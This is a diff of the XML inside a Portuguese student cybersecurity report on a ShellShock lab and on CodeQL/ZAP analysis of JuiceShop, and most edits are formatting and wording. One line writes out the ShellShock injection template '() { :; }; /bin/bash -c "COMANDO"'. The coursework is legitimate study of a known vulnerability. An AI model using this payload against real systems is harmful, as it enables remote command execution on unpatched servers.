+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
             </w:r>
             <w:r>
               <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -2249,13 +2445,15 @@
             </w:r>
             <w:r>
               <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>11</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
+              <w:t>12</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -2264,8 +2462,14 @@
           </w:hyperlink>
         </w:p>
         <w:p>
+          <w:pPr>
+            <w:rPr>
+              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            </w:rPr>
+          </w:pPr>
           <w:r>
             <w:rPr>
+              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               <w:b/>
               <w:bCs/>
             </w:rPr>
@@ -2277,83 +2481,95 @@
     <w:p>
       <w:pPr>
         <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
       </w:pPr>
@@ -2380,17 +2596,341 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>TEXTO AQUI</w:t>
+        <w:ind w:firstLine="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Este documento apresenta o estudo e trabalho realizado para o trabalho do 2º módulo da unidade curricular de </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>cibersegurança</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>. Este documento encontra-se estruturado em duas partes:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="18"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Trabalho e estudo sobre a vulnerabilidade do </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>bash</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> – </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>ShellShock</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>(parte 1 do enunciado).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="18"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Trabalho e estudo sobre ferramentas de análise estática e dinâmica de código </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>(parte 2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> do enunciado</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, como </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>CodeQL</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> e ZAP, dividida nas seguintes subsecções:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="18"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Execução local do </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>CodeQL</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (parte 2.A);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="18"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>JuiceShop</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>github</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>execution</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>parte</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 2.B e C</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="18"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>JuiceShop</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>vulnerabilidades</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>parte</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 2.D)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2413,6 +2953,7 @@
         </w:rPr>
         <w:t xml:space="preserve">Parte 1- </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -2423,6 +2964,7 @@
         <w:t>ShellShock</w:t>
       </w:r>
       <w:bookmarkEnd w:id="1"/>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2540,7 +3082,21 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve">, que será usada nesta parte, mas havia outras maneiras como </w:t>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>a qual</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> será usada nesta parte, mas havia outras maneiras como </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2657,7 +3213,21 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve"> Após inicializar um contentor com a imagem vulnerável, seguindo o enunciado do trabalho, foi utilizado o </w:t>
+        <w:t xml:space="preserve"> Após inicializar um contentor com a imagem vulnerável, seguindo o enunciado do trabalho, foi utilizado </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>um</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2693,7 +3263,7 @@
           <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7438DE22" wp14:editId="7C60E0F2">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7438DE22" wp14:editId="78229F6E">
             <wp:extent cx="3333750" cy="2824514"/>
             <wp:effectExtent l="19050" t="19050" r="19050" b="13970"/>
             <wp:docPr id="797099606" name="Picture 1" descr="A screenshot of a computer screen&#10;&#10;AI-generated content may be incorrect."/>
@@ -2831,6 +3401,7 @@
           <w:noProof/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1318E348" wp14:editId="1C041C0D">
             <wp:extent cx="2825750" cy="1538238"/>
@@ -3022,7 +3593,6 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Vulnerabilidade</w:t>
       </w:r>
       <w:bookmarkEnd w:id="3"/>
@@ -3177,7 +3747,21 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve">, o servidor guarda certas informações presentes no </w:t>
+        <w:t xml:space="preserve">, o servidor guarda </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>determinadas</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> informações presentes no </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3286,7 +3870,28 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve">. Através desta ferramenta descobrimos que se passarmos informação no </w:t>
+        <w:t xml:space="preserve">. Através desta ferramenta descobrimos </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>que</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> é possível </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">passar informação no </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3578,7 +4183,21 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve">Para obter a informação temos de fazer com que a variável de ambiente seja interpretada como uma função, ou seja, o conteúdo do </w:t>
+        <w:t>Para obter a informação temos de fazer com que a variável de ambiente seja interpretada como uma função</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>. Para tal</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, o conteúdo do </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3626,7 +4245,27 @@
           <w:bCs/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t>() { :; }; /bin/bash -c “COMANDO”</w:t>
+        <w:t xml:space="preserve">() </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>{ :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>; }; /bin/bash -c “COMANDO”</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3660,6 +4299,7 @@
           <w:noProof/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12C9F745" wp14:editId="4712E11B">
             <wp:extent cx="4787900" cy="2039812"/>
@@ -4024,7 +4664,6 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:tab/>
       </w:r>
       <w:r>
@@ -4343,7 +4982,15 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve">poderia ser usado para a mesma vulnerabilidade porque o resultado da </w:t>
+        <w:t xml:space="preserve">poderia ser usado para a mesma </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">vulnerabilidade porque o resultado da </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4399,6 +5046,7 @@
         </w:rPr>
         <w:t xml:space="preserve">Após alguns testes parece não ser possível (testado no </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4415,6 +5063,7 @@
         </w:rPr>
         <w:t>Brave</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4429,7 +5078,14 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve">mas a maneira como o browser codifica a </w:t>
+        <w:t>devido à</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> maneira como o browser codifica a </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4565,39 +5221,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve">CodeQL é uma ferramenta de analise de código criada pela empresa </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>Semmle</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
